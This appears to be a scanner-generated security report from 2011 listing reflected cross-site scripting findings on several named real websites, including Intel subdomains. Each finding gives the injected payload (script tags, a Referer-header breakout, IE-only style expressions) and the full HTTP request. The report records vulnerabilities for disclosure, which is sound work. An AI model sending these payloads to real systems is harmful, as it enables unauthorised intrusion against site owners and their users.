HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 06 Feb 2011 01:56:13 GMT Server: gfp-be Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 1304
GA_googleSetAdContentsBySlotForSync({"Tile2_RightCol488f2<script>alert(1)</script>c924c785a0a":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f ...[SNIP]...
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 2c0d9<script>alert(1)</script>9e325663c1f was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mybeta/Search/newsearch.php3?q=32c0d9<script>alert(1)</script>9e325663c1f&Category=(select HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 23:30:06 GMT Content-Type: text/html Connection: close Keep-Alive: timeout=15, max=500 Content-Length: 25829
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the q request parameter is copied into the HTML document as text between TITLE tags. The payload c6f32</title><script>alert(1)</script>2663608f414 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mybeta/Search/newsearch.php3?q=3c6f32</title><script>alert(1)</script>2663608f414&Category=(select HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 23:30:08 GMT Content-Type: text/html Connection: close Keep-Alive: timeout=15, max=500 Content-Length: 26021
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4467d"><script>alert(1)</script>8eb7829c8dc was submitted in the q parameter. This input was echoed as 4467d\"><script>alert(1)</script>8eb7829c8dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mybeta/Search/newsearch.php3?q=34467d"><script>alert(1)</script>8eb7829c8dc&Category=(select HTTP/1.1 Host: www.freedownloadscenter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Date: Sat, 05 Feb 2011 23:30:05 GMT Content-Type: text/html Connection: close Keep-Alive: timeout=15, max=500 Content-Length: 25901
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 865a4"-alert(1)-"ce65034e0f1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml HTTP/1.1 Host: appdeveloper.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=865a4"-alert(1)-"ce65034e0f1
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 23:18:20 GMT Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Set-Cookie: SESS5a5e2306769d28180c45e44dbead8572=38574e65cbb57f2b899725d71389c0ab; expires=Tue, 01-Mar-2011 02:51:40 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 05 Feb 2011 23:18:20 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Set-Cookie: loginpt=0 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> ...[SNIP]... ustom24 = ""; var wa_eCustom28="http://appdeveloper.intel.com/en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml";
var wa_custom11="http://www.google.com/search?hl=en&q=865a4"-alert(1)-"ce65034e0f1";
var wa_urlQueryString=""; var wa_reportSuites="intelappdeveloper,intelcorpsw"; var wa_trackDFA="n";
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edeec"style%3d"x%3aexpression(alert(1))"e9cdcf08be6 was submitted in the REST URL parameter 10. This input was echoed as edeec"style="x:expression(alert(1))"e9cdcf08be6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporationsedeec"style%3d"x%3aexpression(alert(1))"e9cdcf08be6 HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporationsedeec"style="x:expression(alert(1))"e9cdcf08be6?cid=rss-182178-c1-264110"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b7ba"style%3d"x%3aexpression(alert(1))"c49e060793 was submitted in the REST URL parameter 2. This input was echoed as 2b7ba"style="x:expression(alert(1))"c49e060793 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-2641102b7ba"style%3d"x%3aexpression(alert(1))"c49e060793/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-2641102b7ba"style="x:expression(alert(1))"c49e060793"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f74ef"style%3d"x%3aexpression(alert(1))"4e7c6c9736f was submitted in the REST URL parameter 3. This input was echoed as f74ef"style="x:expression(alert(1))"4e7c6c9736f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264110/newsroom.intel.comf74ef"style%3d"x%3aexpression(alert(1))"4e7c6c9736f/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.comf74ef"style="x:expression(alert(1))"4e7c6c9736f/community/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3c60"style%3d"x%3aexpression(alert(1))"f7e517be872 was submitted in the REST URL parameter 4. This input was echoed as a3c60"style="x:expression(alert(1))"f7e517be872 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264110/newsroom.intel.com/communitya3c60"style%3d"x%3aexpression(alert(1))"f7e517be872/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/communitya3c60"style="x:expression(alert(1))"f7e517be872/intel_newsroom/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76889"style%3d"x%3aexpression(alert(1))"10790f520d6 was submitted in the REST URL parameter 5. This input was echoed as 76889"style="x:expression(alert(1))"10790f520d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom76889"style%3d"x%3aexpression(alert(1))"10790f520d6/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom76889"style="x:expression(alert(1))"10790f520d6/blog/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 836ce"style%3d"x%3aexpression(alert(1))"5c86aca20ef was submitted in the REST URL parameter 6. This input was echoed as 836ce"style="x:expression(alert(1))"5c86aca20ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog836ce"style%3d"x%3aexpression(alert(1))"5c86aca20ef/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog836ce"style="x:expression(alert(1))"5c86aca20ef/2011/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0641"style%3d"x%3aexpression(alert(1))"b954a0a85d7 was submitted in the REST URL parameter 7. This input was echoed as a0641"style="x:expression(alert(1))"b954a0a85d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011a0641"style%3d"x%3aexpression(alert(1))"b954a0a85d7/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011a0641"style="x:expression(alert(1))"b954a0a85d7/01/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9097b"style%3d"x%3aexpression(alert(1))"cec4b375443 was submitted in the REST URL parameter 8. This input was echoed as 9097b"style="x:expression(alert(1))"cec4b375443 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/019097b"style%3d"x%3aexpression(alert(1))"cec4b375443/31/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/019097b"style="x:expression(alert(1))"cec4b375443/31/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110"> ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3032"style%3d"x%3aexpression(alert(1))"44ad55bd7e was submitted in the REST URL parameter 9. This input was echoed as d3032"style="x:expression(alert(1))"44ad55bd7e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264110/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31d3032"style%3d"x%3aexpression(alert(1))"44ad55bd7e/chip-shot-intel-among-top-100-most-sustainable-corporations HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31d3032"style="x:expression(alert(1))"44ad55bd7e/chip-shot-intel-among-top-100-most-sustainable-corporations?cid=rss-182178-c1-264110"> ...[SNIP]...
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1f4c"style%3d"x%3aexpression(alert(1))"fade0cdb384 was submitted in the REST URL parameter 10. This input was echoed as b1f4c"style="x:expression(alert(1))"fade0cdb384 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industryb1f4c"style%3d"x%3aexpression(alert(1))"fade0cdb384 HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industryb1f4c"style="x:expression(alert(1))"fade0cdb384?cid=rss-182178-c1-264136"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ebf"style%3d"x%3aexpression(alert(1))"590865e6e81 was submitted in the REST URL parameter 2. This input was echoed as b0ebf"style="x:expression(alert(1))"590865e6e81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264136b0ebf"style%3d"x%3aexpression(alert(1))"590865e6e81/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136b0ebf"style="x:expression(alert(1))"590865e6e81"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 466d2"style%3d"x%3aexpression(alert(1))"1ac3c960942 was submitted in the REST URL parameter 3. This input was echoed as 466d2"style="x:expression(alert(1))"1ac3c960942 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264136/newsroom.intel.com466d2"style%3d"x%3aexpression(alert(1))"1ac3c960942/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com466d2"style="x:expression(alert(1))"1ac3c960942/community/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9389"style%3d"x%3aexpression(alert(1))"f5c3f0bb420 was submitted in the REST URL parameter 4. This input was echoed as b9389"style="x:expression(alert(1))"f5c3f0bb420 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264136/newsroom.intel.com/communityb9389"style%3d"x%3aexpression(alert(1))"f5c3f0bb420/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/communityb9389"style="x:expression(alert(1))"f5c3f0bb420/intel_newsroom/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12e33"style%3d"x%3aexpression(alert(1))"4ade294bbf was submitted in the REST URL parameter 5. This input was echoed as 12e33"style="x:expression(alert(1))"4ade294bbf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom12e33"style%3d"x%3aexpression(alert(1))"4ade294bbf/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom12e33"style="x:expression(alert(1))"4ade294bbf/blog/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f162d"style%3d"x%3aexpression(alert(1))"85b19f3f875 was submitted in the REST URL parameter 6. This input was echoed as f162d"style="x:expression(alert(1))"85b19f3f875 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blogf162d"style%3d"x%3aexpression(alert(1))"85b19f3f875/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blogf162d"style="x:expression(alert(1))"85b19f3f875/2011/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81880"style%3d"x%3aexpression(alert(1))"bb824d9c0ed was submitted in the REST URL parameter 7. This input was echoed as 81880"style="x:expression(alert(1))"bb824d9c0ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/201181880"style%3d"x%3aexpression(alert(1))"bb824d9c0ed/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/201181880"style="x:expression(alert(1))"bb824d9c0ed/01/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8cfc"style%3d"x%3aexpression(alert(1))"cbc4fac7e2f was submitted in the REST URL parameter 8. This input was echoed as d8cfc"style="x:expression(alert(1))"cbc4fac7e2f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264136/newsroom.intel.com/community/intel_newsroom/blog/2011/01d8cfc"style%3d"x%3aexpression(alert(1))"cbc4fac7e2f/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01d8cfc"style="x:expression(alert(1))"cbc4fac7e2f/31/chip-shot-silicon-photonics-news--helping-researchers-to-develop-a-new-industry?cid=rss-182178-c1-264136"> ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bac26"style%3d"x%3aexpression(alert(1))"4f9f28749e was submitted in the REST URL parameter 9. This input was echoed as bac26"style="x:expression(alert(1))"4f9f28749e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
